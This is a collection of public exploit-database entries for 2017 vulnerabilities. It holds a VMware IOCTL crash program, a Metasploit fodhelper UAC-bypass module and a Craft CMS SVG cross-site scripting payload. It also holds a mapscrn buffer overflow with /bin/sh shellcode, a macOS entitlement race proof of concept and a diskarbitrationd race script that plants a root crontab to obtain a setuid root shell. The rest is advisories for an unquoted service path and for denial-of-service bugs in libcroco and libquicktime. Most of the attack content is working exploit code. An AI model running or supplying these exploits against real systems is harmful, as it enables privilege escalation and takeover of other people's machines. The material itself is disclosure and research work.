DWORD dummy;
char reply[0x3FDC];
hfile = CreateFileW(vstore, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
char buf[384] = "\x80\x01\x00\x00\xc8\xdc\x00\x00\xba\xab";
DeviceIoControl(hfile, 0x2a002c, buf, 382, reply, sizeof(reply), &dummy, NULL);
}
void run_vix()
{
STARTUPINFO si;
PROCESS_INFORMATION pi;
RtlZeroMemory(&si, sizeof(si));
RtlZeroMemory(&pi, sizeof(pi));
si.dwFlags |= STARTF_USESHOWWINDOW;
si.wShowWindow = SW_HIDE;
DWORD createFlags = CREATE_SUSPENDED;
CreateProcess(L"C:\\Program Files (x86)\\VMware\\VMware Workstation\\vixDiskMountServer.exe", NULL, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi);
}
void main()
{
run_vix(); //Comment this if vixDiskMountServer.exe is already running
ioctl_crash();
}
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/exploit/exe'
require 'msf/core/exploit/powershell'
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Exploit::Powershell
include Post::Windows::Priv
include Post::Windows::Registry
include Post::Windows::Runas
FODHELPER_DEL_KEY = "HKCU\\Software\\Classes\\ms-settings".freeze
FODHELPER_WRITE_KEY = "HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command".freeze
EXEC_REG_DELEGATE_VAL = 'DelegateExecute'.freeze
EXEC_REG_VAL = ''.freeze # This maps to "(Default)"
EXEC_REG_VAL_TYPE = 'REG_SZ'.freeze
FODHELPER_PATH = "%WINDIR%\\System32\\fodhelper.exe".freeze
CMD_MAX_LEN = 16383
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Windows UAC Protection Bypass (Via FodHelper Registry Key)',
'Description' => %q{
This module will bypass Windows 10 UAC by hijacking a special key in the Registry under
the current user hive, and inserting a custom command that will get invoked when
the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC
flag turned off.
This module modifies a registry key, but cleans up the key once the payload has
been invoked.
The module does not require the architecture of the payload to match the OS. If
specifying EXE::Custom your DLL should call ExitProcess() after starting your
payload in a separate process.
},
'License' => MSF_LICENSE,
'Author' => [
'winscriptingblog', # UAC bypass discovery and research
'amaloteaux', # MSF module
],
'Platform' => ['win'],
'SessionTypes' => ['meterpreter'],
'Targets' => [
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
[ 'Windows x64', { 'Arch' => ARCH_X64 } ]
],
'DefaultTarget' => 0,
'References' => [
[
'URL', 'https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/',
'URL', 'https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1'
]
],
'DisclosureDate' => 'May 12 2017'
)
)
end
def check
if sysinfo['OS'] =~ /Windows (10)/ && is_uac_enabled?
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
end
def exploit
commspec = '%COMSPEC%'
registry_view = REGISTRY_VIEW_NATIVE
psh_path = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe"
# Make sure we have a sane payload configuration
if sysinfo['Architecture'] == ARCH_X64
if session.arch == ARCH_X86
# fodhelper.exe is x64 only exe
commspec = '%WINDIR%\\Sysnative\\cmd.exe'
if target_arch.first == ARCH_X64
# We can't use absolute path here as
# %WINDIR%\\System32 is always converted into %WINDIR%\\SysWOW64 from a x86 session
psh_path = "powershell.exe"
end
end
if target_arch.first == ARCH_X86
# Invoking x86, so switch to SysWOW64
psh_path = "%WINDIR%\\SysWOW64\\WindowsPowershell\\v1.0\\powershell.exe"
end
else
# if we're on x86, we can't handle x64 payloads
if target_arch.first == ARCH_X64
fail_with(Failure::BadConfig, 'x64 Target Selected for x86 System')
end
end
if !payload.arch.empty? && (payload.arch.first != target_arch.first)
fail_with(Failure::BadConfig, 'payload and target should use the same architecture')
end
# Validate that we can actually do things before we bother
# doing any more work
check_permissions!
case get_uac_level
when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
fail_with(Failure::NotVulnerable,
"UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
when UAC_DEFAULT
print_good('UAC is set to Default')
print_good('BypassUAC can bypass this setting, continuing...')
when UAC_NO_PROMPT
print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
shell_execute_exe
return
end
payload_value = rand_text_alpha(8)
psh_path = expand_path(psh_path)
template_path = Rex::Powershell::Templates::TEMPLATE_DIR
psh_payload = Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload.encoded)
if psh_payload.length > CMD_MAX_LEN
fail_with(Failure::None, "Payload size should be smaller then #{CMD_MAX_LEN} (actual size: #{psh_payload.length})")
end
psh_stager = "\"IEX (Get-ItemProperty -Path #{FODHELPER_WRITE_KEY.gsub('HKCU', 'HKCU:')} -Name #{payload_value}).#{payload_value}\""
cmd = "#{psh_path} -nop -w hidden -c #{psh_stager}"
existing = registry_getvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, registry_view) || ""
exist_delegate = !registry_getvaldata(FODHELPER_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view).nil?
if existing.empty?
registry_createkey(FODHELPER_WRITE_KEY, registry_view)
end
print_status("Configuring payload and stager registry keys ...")
unless exist_delegate
registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_DELEGATE_VAL, '', EXEC_REG_VAL_TYPE, registry_view)
end
registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, cmd, EXEC_REG_VAL_TYPE, registry_view)
registry_setvaldata(FODHELPER_WRITE_KEY, payload_value, psh_payload, EXEC_REG_VAL_TYPE, registry_view)
# Calling fodhelper.exe through cmd.exe allow us to launch it from either x86 or x64 session arch.
cmd_path = expand_path(commspec)
cmd_args = expand_path("/c #{FODHELPER_PATH}")
print_status("Executing payload: #{cmd_path} #{cmd_args}")
# We can't use cmd_exec here because it blocks, waiting for a result.
client.sys.process.execute(cmd_path, cmd_args, { 'Hidden' => true })
# Wait a copule of seconds to give the payload a chance to fire before cleaning up
# TODO: fix this up to use something smarter than a timeout?
Rex::sleep(5)
handler(client)
print_status("Cleaining up registry keys ...")
unless exist_delegate
registry_deleteval(FODHELPER_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view)
end
if existing.empty?
registry_deletekey(FODHELPER_DEL_KEY, registry_view)
else
registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view)
end
registry_deleteval(FODHELPER_WRITE_KEY, payload_value, registry_view)
end
def check_permissions!
fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
# Check if you are an admin
vprint_status('Checking admin status...')
admin_group = is_in_admin_group?
unless check == Exploit::CheckCode::Appears
fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
end
unless is_in_admin_group?
fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
end
print_status('UAC is Enabled, checking level...')
if admin_group.nil?
print_error('Either whoami is not there or failed to execute')
print_error('Continuing under assumption you already checked...')
else
if admin_group
print_good('Part of Administrators group! Continuing...')
else
fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
end
end
if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
end
end
end
# Exploit Title: Unquoted Service Path Privilege Escalation - Net Monitor for Employees Pro <= 5.3.4
# Date: 18/03/2017
# Exploit Author: Saeid Atabaki
# E-Mail: bytecod3r <at> gmail.com, saeid <at> Nsecurity.org
# Linkedin: https://www.linkedin.com/in/saeidatabaki
# Vendor Homepage: http://networklookout.com/
# Version: <= 5.3.4
# CVE: CVE-2017-7180
# Vendor Not Resoponding. contacted vendor 18/3/2017
Net Monitor for Employees is an application to monitor users machine and its agent based. Its agent install itself as a service ("Net Monitor for Employees Agent") with an unquoted service path running with SYSTEM privileges. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system.
C:\Users\Win7>sc qc "Net Monitor for Employees Agent"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Net Monitor for Employees Agent
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Net Monitor for Employees Pro\bin\nmep_ctrlagentsvc.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Net Monitor for Employees Agent
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
A successful attempt would require the local attacker must insert an executable file in the path of the service. Upon service restart or system reboot, the malicious code will be run with elevated privileges.
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c) BYTECOD3R
# Exploit Title: Craft CMS 2.6 - Cross-Site Scripting/Unrestricted File Upload
# Date: 2017-06-08
# Exploit Author: Ahsan Tahir
# Vendor Homepage: https://craftcms.com
# Software Link: http://download.craftcdn.com/craft/2.6/2.6.2981/Craft-2.6.2981.zip
# Version: 2.6
# Tested on: [Kali Linux 2.0 | Windows 8.1]
# Email: mrahsan1337@gmail.com
# Contact: https://twitter.com/AhsanTahirAT
Release Date:
=============
2017-06-08
Product & Service Introduction:
===============================
Craft is a content-first CMS that aims to make life enjoyable for developers and content managers alike.
Abstract Advisory Information:
==============================
Ahsan Tahir, an independent security researcher discovered a Persistent Cross-Site Scripting Vulnerability through Unrestricted File Upload of SVG file in Craft CMS (v2.6)
Vulnerability Disclosure Timeline:
==================================
2017-06-08: Found the vulnerability.
2017-06-08: Reported to vendor.
2017-06-08: Published.
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
The security risk of the xss vulnerability is estimated as medium with a common vulnerability scoring system count of 3.6.
Exploitation of the persistent xss web vulnerability requires a limited editor user account with low privileged (only editing news) and only low user interaction.
If attacker upload any file that can use for XSS (HTML, SWF, PHP etc..) it will not accept to uplaod as image. But for images it will stay the same. So if attacker upload SVG with JS content it will work fine and execute JS!
The "Content-Type: image/svg+xml; charset=us-ascii" header will make this XSS attack work.
Successful exploitation of the XSS vulnerability results in persistent phishing attacks, session hijacking, persistent external redirect to malicious sources and persistent manipulation of affected or connected web module context.
Proof of Concept (PoC):
=======================
The persistent input validation vulnerability can be exploited by a low prviledged user/editor with privileges, only for editing news. After successful exploitation, this attack can be used by editor to hijack admin account!
For security demonstraton or to reproduce the vulnerability follow the provided information and steps below to continue.
Payload (Exploitation):
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
[+] Manual steps to reproduce ..
1. Login with the editor account (only privilege to edit news) in Craft CMS
2. Go to 'add news' option: https://localhost/admin/entries/news/new
3. Put random values in title
4. In your attacker machine, create a file named 'xss.svg' (without quotes) and inject the payload in the file:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
4. Upload the xss.svg file in featured image option in Craft CMS
5. Click on Save
6. Now go to: https://localhost/s/assets/site/xss.svg
7. XSS payload execution occurs and alert pop-up with domain name
Credits & Authors:
==================
Ahsan Tahir - [https://twitter.com/AhsanTahirAT]
# Developed using Exploit Pack - http://exploitpack.com - <jsacco@exploitpack.com>
# Tested on: GNU/Linux - Kali 2017.1 Release
#
# Description: Mapscrn ( Part of setfont ) 2.0.3
# The mapscrn command loads a user defined output character mapping table into the console driver.
# The console driver may be later put into use user-defined mapping table mode by outputting a special
# escape sequence to the console device.
#
# An attacker could exploit this vulnerability to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
#
# Architecture: all
#
# Vendor homepage: http://ccross.msk.su
#
# Source and destination overlap in strcpy(0xbe95fc4c, 0xbe9610df)
# at 0x4831518: strcpy (vg_replace_strmem.c:506)
# by 0x10A71F: ??? (in /usr/bin/mapscrn)
# by 0x10933B: ??? (in /usr/bin/mapscrn)
# by 0x41414140: ???
#
# Invalid read of size 2
# at 0x488DFCA: getenv (getenv.c:84)
# by 0x48867AE: guess_category_value (dcigettext.c:1587)
# by 0x48867AE: __dcigettext (dcigettext.c:667)
# by 0x48855F5: dcgettext (dcgettext.c:47)
# by 0x109733: ??? (in /usr/bin/mapscrn)
# by 0x41414140: ???
# Address 0x41414141 is not stack'd, malloc'd or (recently) free'd
#
# Process terminating with default action of signal 11 (SIGSEGV)
# Access not within mapped region at address 0x41414141
# at 0x488DFCA: getenv (getenv.c:84)
# by 0x48867AE: guess_category_value (dcigettext.c:1587)
# by 0x48867AE: __dcigettext (dcigettext.c:667)
# by 0x48855F5: dcgettext (dcgettext.c:47)
# by 0x109733: ??? (in /usr/bin/mapscrn)
# by 0x41414140: ???
import os,subprocess
junk = "\x41" * 4880 # junk to offset
nops = "\x90" * 24 # nops
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
esp = "\xe0\xdf\xff\xbf" # Must be changed
buffer = junk + esp + nops + shellcode # Craft the buffer
try:
print("[*] Mapscrn Stack-Based Buffer Overflow by Juan Sacco")
print("[*] Please wait.. running")
subprocess.call(["mapscrn", buffer])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "Mapscrn not found!"
else:
print "Error executing exploit"
raise
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1223
One way processes in userspace that offer mach services check whether they should perform an action on
behalf of a client from which they have received a message is by checking whether the sender possesses a certain entitlement.
These decisions are made using the audit token which is appended by the kernel to every received mach message.
The audit token contains amongst other things the senders uid, gid, ruid, guid, pid and pid generation number (p_idversion.)
The canonical way which userspace daemons check a message sender's entitlements is as follows:
audit_token_t tok;
xpc_connection_get_audit_token(conn, &tok);
SecTaskRef sectask = SecTaskCreateWithAuditToken(kCFAllocatorDefault, tok);
CFErrorRef err;
CFTypeRef entitlement = SecTaskCopyValueForEntitlement(sectask, CFSTR("com.apple.an_entitlement_name"), &err);
/* continue and check that entitlement is non-NULL, is a CFBoolean and has the value CFBooleanTrue */
The problem is that SecTaskCreateWithAuditToken only uses the pid, not also the pid generation number
to build the SecTaskRef:
SecTaskRef SecTaskCreateWithAuditToken(CFAllocatorRef allocator, audit_token_t token)
{
SecTaskRef task;
task = SecTaskCreateWithPID(allocator, audit_token_to_pid(token));
...
This leaves two avenues for a sender without an entitlement to talk to a service which requires it:
a) If the process can exec binaries then they can simply send the message then exec a system binary with that entitlement.
This pid now maps to the entitlements of that new binary.
b) If the process can't exec a binary (it's in a sandbox for example) then exploitation is still possible if the processes has the ability to
crash and force the restart of a binary with that entitlement (a common case, eg via an OOM or NULL pointer deref in a mach service.)
The attacker process will have to crash and force the restart of a process with the entitlement a sufficient number of times to wrap
the next free pid around such that when it sends the request to the target then forces the entitled process to crash it can crash itself and
have its pid reused by the respawned entitled process.
Scenario b) is not so outlandish, such a setup could be achieved via a renderer bug with ability to gain code execution in new renderer processes
as they are created.
You would also not necessarily be restricted to just being able to send one mach message to the target service as there's no
constraint that a mach message's reply port has to point back to the sending process; you could for example stash a receive right with
another process or launchd so that you can still engage in a full bi-directional communication with the target service even
if the audit token was always checked.
The security implications of this depend on what the security guarantees of entitlements are. It's certainly the case that this enables
you to talk to a far greater range of services as many system services use entitlement checks to restrict their clients to a small number
of whitelisted binaries.
This may also open up access to privileged information which is protected by the entitlements.
This PoC just demonstrates that we can send an xpc message to a daemon which expects its clients to have the "com.apple.corecapture.manager-access"
entitlement and pass the check without having that entitlement.
We'll target com.apple.corecaptured which expects that only the cctool or sharingd binaries can talk to it.
use an lldb invocation like:
sudo lldb -w -n corecaptured
then run this poc and set a breakpoint after the hasEntitlement function in the CoreCaptureDaemon library.
You'll notice that the check passes and our xpc message has been received and will now be processes by the daemon.
Obviously attaching the debugger like this artificially increases the race window but by for example sending many bogus large messages beforehand
we could ensure the target service has many messages in its mach port queue to make the race more winnable.
PoC tested on MacOS 10.12.3 (16D32)
*/
// ianbeer
#if 0
MacOS/iOS userspace entitlement checking is racy
One way processes in userspace that offer mach services check whether they should perform an action on
behalf of a client from which they have received a message is by checking whether the sender possesses a certain entitlement.
These decisions are made using the audit token which is appended by the kernel to every received mach message.
The audit token contains amongst other things the senders uid, gid, ruid, guid, pid and pid generation number (p_idversion.)
The canonical way which userspace daemons check a message sender's entitlements is as follows:
audit_token_t tok;
xpc_connection_get_audit_token(conn, &tok);
SecTaskRef sectask = SecTaskCreateWithAuditToken(kCFAllocatorDefault, tok);
CFErrorRef err;
CFTypeRef entitlement = SecTaskCopyValueForEntitlement(sectask, CFSTR("com.apple.an_entitlement_name"), &err);
/* continue and check that entitlement is non-NULL, is a CFBoolean and has the value CFBooleanTrue */
The problem is that SecTaskCreateWithAuditToken only uses the pid, not also the pid generation number
to build the SecTaskRef:
SecTaskRef SecTaskCreateWithAuditToken(CFAllocatorRef allocator, audit_token_t token)
{
SecTaskRef task;
task = SecTaskCreateWithPID(allocator, audit_token_to_pid(token));
...
This leaves two avenues for a sender without an entitlement to talk to a service which requires it:
a) If the process can exec binaries then they can simply send the message then exec a system binary with that entitlement.
This pid now maps to the entitlements of that new binary.
b) If the process can't exec a binary (it's in a sandbox for example) then exploitation is still possible if the processes has the ability to
crash and force the restart of a binary with that entitlement (a common case, eg via an OOM or NULL pointer deref in a mach service.)
The attacker process will have to crash and force the restart of a process with the entitlement a sufficient number of times to wrap
the next free pid around such that when it sends the request to the target then forces the entitled process to crash it can crash itself and
have its pid reused by the respawned entitled process.
Scenario b) is not so outlandish, such a setup could be achieved via a renderer bug with ability to gain code execution in new renderer processes
as they are created.
You would also not necessarily be restricted to just being able to send one mach message to the target service as there's no
constraint that a mach message's reply port has to point back to the sending process; you could for example stash a receive right with
another process or launchd so that you can still engage in a full bi-directional communication with the target service even
if the audit token was always checked.
The security implications of this depend on what the security guarantees of entitlements are. It's certainly the case that this enables
you to talk to a far greater range of services as many system services use entitlement checks to restrict their clients to a small number
of whitelisted binaries.
This may also open up access to privileged information which is protected by the entitlements.
This PoC just demonstrates that we can send an xpc message to a daemon which expects its clients to have the "com.apple.corecapture.manager-access"
entitlement and pass the check without having that entitlement.
We'll target com.apple.corecaptured which expects that only the cctool or sharingd binaries can talk to it.
use an lldb invocation like:
sudo lldb -w -n corecaptured
then run this poc and set a breakpoint after the hasEntitlement function in the CoreCaptureDaemon library.
You'll notice that the check passes and our xpc message has been received and will now be processes by the daemon.
Obviously attaching the debugger like this artificially increases the race window but by for example sending many bogus large messages beforehand
we could ensure the target service has many messages in its mach port queue to make the race more winnable.
PoC tested on MacOS 10.12.3 (16D32)
#endif
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <mach/mach.h>
#include <xpc/xpc.h>
void exec_blocking(char* target, char** argv, char** envp) {
// create the pipe
int pipefds[2];
pipe(pipefds);
int read_end = pipefds[0];
int write_end = pipefds[1];
// make the pipe nonblocking so we can fill it
int flags = fcntl(write_end, F_GETFL);
flags |= O_NONBLOCK;
fcntl(write_end, F_SETFL, flags);
// fill up the write end
int ret, count = 0;
do {
char ch = ' ';
ret = write(write_end, &ch, 1);
count++;
} while (!(ret == -1 && errno == EAGAIN));
printf("wrote %d bytes to pipe buffer\n", count-1);
// make it blocking again
flags = fcntl(write_end, F_GETFL);
flags &= ~O_NONBLOCK;
fcntl(write_end, F_SETFL, flags);
// set the pipe write end to stdout/stderr
dup2(write_end, 1);
dup2(write_end, 2);
execve(target, argv, envp);
}
xpc_connection_t connect(char* service_name){
xpc_connection_t conn = xpc_connection_create_mach_service(service_name, NULL, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
xpc_connection_set_event_handler(conn, ^(xpc_object_t event) {
xpc_type_t t = xpc_get_type(event);
if (t == XPC_TYPE_ERROR){
printf("err: %s\n", xpc_dictionary_get_string(event, XPC_ERROR_KEY_DESCRIPTION));
}
printf("received an event\n");
});
xpc_connection_resume(conn);
return conn;
}
int main(int argc, char** argv, char** envp) {
xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);
xpc_dictionary_set_string(msg, "CCConfig", "hello from a sender without entitlements!");
xpc_connection_t conn = connect("com.apple.corecaptured");
xpc_connection_send_message(conn, msg);
// exec a binary with the entitlement to talk to that daemon
// make sure it doesn't exit by giving it a full pipe for stdout/stderr
char* target_binary = "/System/Library/PrivateFrameworks/CoreCaptureControl.framework/Versions/A/Resources/cctool";
char* target_argv[] = {target_binary, NULL};
exec_blocking(target_binary, target_argv, envp);
return 0;
}
#!/bin/bash
# Sources:
# https://raw.githubusercontent.com/phoenhex/files/master/pocs/poc-mount.sh
# https://phoenhex.re/2017-06-09/pwn2own-diskarbitrationd-privesc
if ! security authorize system.volume.internal.mount &>/dev/null; then
echo 2>&1 "Cannot acquire system.volume.internal.mount right. This will not work."
exit 1
fi
TARGET=/private/var/at
SUBDIR=tabs
DISK=/dev/disk0s1
TMPDIR=/tmp/pwn
mkdir -p $TMPDIR
cd $TMPDIR
cat << EOF > boom.c
#include <assert.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char ** argv) {
assert(argc == 2);
setuid(0);
setgid(0);
system(argv[1]);
}
EOF
clang boom.c -o _boom || exit 1
race_link() {
mkdir -p mounts
while true; do
ln -snf mounts link
ln -snf $TARGET link
done
}
race_mount() {
while ! df -h | grep $TARGET >/dev/null; do
while df -h | grep $DISK >/dev/null; do
diskutil umount $DISK &>/dev/null
done
while ! df -h | grep $DISK >/dev/null; do
diskutil mount -mountPoint $TMPDIR/link/$SUBDIR $DISK &>/dev/null
done
done
}
cleanup() {
echo "Killing child process $PID and cleaning up tmp dir"
kill -9 $PID
rm -rf $TMPDIR
}
if df -h | grep $DISK >/dev/null; then
echo 2>&1 "$DISK already mounted. Exiting."
exit 1
fi
race_link &
PID=$!
trap cleanup EXIT
echo "Just imagine having that root shell. It's gonna be legen..."
race_mount
echo "wait for it..."
CMD="cp $TMPDIR/_boom $TMPDIR/boom; chmod u+s $TMPDIR/boom"
rm -f /var/at/tabs/root
echo "* * * * *" "$CMD" > /var/at/tabs/root
while ! [ -e $TMPDIR/boom ]; do
sleep 1
done
echo "dary!"
kill -9 $PID
sleep 0.1
$TMPDIR/boom "rm /var/at/tabs/root"
$TMPDIR/boom "umount -f $DISK"
$TMPDIR/boom "rm -rf $TMPDIR; cd /; su"
libcroco multiple vulnerabilities
================
Author : qflb.wu
===============
Introduction:
=============
Libcroco is a standalone css2 parsing and manipulation library.
The parser provides a low level event driven SAC like api and a css object model like api.
Libcroco provides a CSS2 selection engine and an experimental xml/css rendering engine.
Affected version:
=====
0.6.12
Vulnerability Description:
==========================
1.
the cr_tknzr_parse_comment function in cr-tknzr.c in libcroco 0.6.12 can cause a denial of service (memory allocation error) via a crafted CSS file.
./csslint-0.6 --dump-location libcroco_0_6_12_memory_allocation_error.css
==21841==ERROR: AddressSanitizer failed to allocate 0x20002000 (536879104) bytes of LargeMmapAllocator: 12
...
==21841==AddressSanitizer CHECK failed: /build/buildd/llvm-toolchain-3.4-3.4/projects/compiler-rt/lib/sanitizer_common/sanitizer_posix.cc:68 "(("unable to mmap" && 0)) != (0)" (0x0, 0x0)
...
#10 0x7fd78c2fcb4d in cr_tknzr_parse_comment /home/a/Downloads/libcroco-0.6.12/src/cr-tknzr.c:462
#11 0x7fd78c2fcb4d in cr_tknzr_get_next_token /home/a/Downloads/libcroco-0.6.12/src/cr-tknzr.c:2218
#12 0x7fd78c356f6e in cr_parser_try_to_skip_spaces_and_comments /home/a/Downloads/libcroco-0.6.12/src/cr-parser.c:634
#13 0x7fd78c368a43 in cr_parser_parse_stylesheet /home/a/Downloads/libcroco-0.6.12/src/cr-parser.c:2538
#14 0x7fd78c368a43 in cr_parser_parse /home/a/Downloads/libcroco-0.6.12/src/cr-parser.c:4381
#15 0x480a8e in sac_parse_and_display_locations /home/a/Downloads/libcroco-0.6.12/csslint/csslint.c:960
#16 0x480a8e in main /home/a/Downloads/libcroco-0.6.12/csslint/csslint.c:1001
#17 0x7fd78b397f44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)
#18 0x47c95c in _start (/home/a/Downloads/libcroco-0.6.12/csslint/.libs/lt-csslint-0.6+0x47c95c)
Reproducer:
libcroco_0_6_12_memory_allocation_error.css
CVE:
CVE-2017-8834
2.
The cr_parser_parse_selector_core function in cr-parser.c in libcroco 0.6.12 can cause a denial of service(infinite loop and CPU consumption) via a crafted CSS file.
./csslint-0.6 --dump-location libcroco_0_6_12_infinite_loop.css
Reproducer:
libcroco_0_6_12_infinite_loop.css
CVE:
CVE-2017-8871
===============================
qflb.wu () dbappsecurity com cn
Proofs of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42147.zip
libquicktime multiple vulnerabilities
================
Author : qflb.wu
===============
Introduction:
=============
The libquicktime package contains the libquicktime library, various plugins and codecs, along with graphical and command line utilities used for encoding and decoding QuickTime files. This is useful for reading and writing files in the QuickTime format. The goal of the project is to enhance, while providing compatibility with the Quicktime 4 Linux library.
Affected version:
=====
1.2.4
Vulnerability Description:
==========================
##################################
1.
the quicktime_read_moov function in moov.c in libquicktime 1.2.4 can cause a denial of service(infinite loop and CPU consumption) via a crafted mp4 file.
./lqtplay libquicktime_1.2.4_quicktime_read_moov_infinite_loop.mp4
POC:
libquicktime_1.2.4_quicktime_read_moov_infinite_loop.mp4
CVE:
CVE-2017-9122
###################################
2.
the lqt_frame_duration function in lqt_quicktime.c in libquicktime 1.2.4 can cause a denial of service(invalid memory read and application crash) via a crafted mp4 file.
./lqtplay libquicktime_1.2.4_lqt_frame_duration_invalid_memory_read.mp4
ASAN:SIGSEGV
=================================================================
==14254==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000004 (pc 0x7f31e6ae7185 sp 0x7ffed033a270 bp 0x0000006bdb50 T0)
==14254==WARNING: Trying to symbolize code, but external symbolizer is not initialized!
#0 0x7f31e6ae7184 (/usr/local/lib/libquicktime.so.0+0x6c184)
#1 0x49b1c6 (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x49b1c6)
#2 0x47fbaa (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47fbaa)
#3 0x7f31e43b2ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
#4 0x47f3dc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV ??:0 ??
==14254==ABORTING
debug info:
Program received signal SIGSEGV, Segmentation fault.
...
Stopped reason: SIGSEGV
0x00007ffff7829185 in lqt_frame_duration (file=<optimized out>, track=<optimized out>,
constant=<optimized out>) at lqt_quicktime.c:1242
1242 return
POC:
libquicktime_1.2.4_lqt_frame_duration_invalid_memory_read.mp4
CVE:
CVE-2017-9123
###################################
3.
the quicktime_match_32 in util.c in libquicktime 1.2.4 can cause a denial of service(NULL pointer dereference and application crash) via a crafted mp4 file.
./lqtplay libquicktime_1.2.4_quicktime_match_32_NULL_pointer_dereference.mp4
ASAN:SIGSEGV
=================================================================
==14359==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7fe8af6b85d8 sp 0x7fff490cd4e0 bp 0x7fff490cd5b0 T0)
==14359==WARNING: Trying to symbolize code, but external symbolizer is not initialized!
#0 0x7fe8af6b85d7 (/usr/local/lib/libquicktime.so.0+0x3605d7)
#1 0x7fe8af68b566 (/usr/local/lib/libquicktime.so.0+0x333566)
#2 0x7fe8af63c71a (/usr/local/lib/libquicktime.so.0+0x2e471a)
#3 0x7fe8af3d1658 (/usr/local/lib/libquicktime.so.0+0x79658)
#4 0x7fe8af3d84a8 (/usr/local/lib/libquicktime.so.0+0x804a8)
#5 0x7fe8af3a95da (/usr/local/lib/libquicktime.so.0+0x515da)
#6 0x47fad2 (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47fad2)
#7 0x7fe8acc8fec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
#8 0x47f3dc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV ??:0 ??
==14359==ABORTING
debug info:
Program received signal SIGSEGV, Segmentation fault.
Stopped reason: SIGSEGV
0x00007ffff7b1d5d8 in quicktime_match_32 (_input=<optimized out>,
_output=<optimized out>) at util.c:874
874if(input[0] == output[0] &&
POC:
libquicktime_1.2.4_quicktime_match_32_NULL_pointer_dereference.mp4
CVE:
CVE-2017-9124
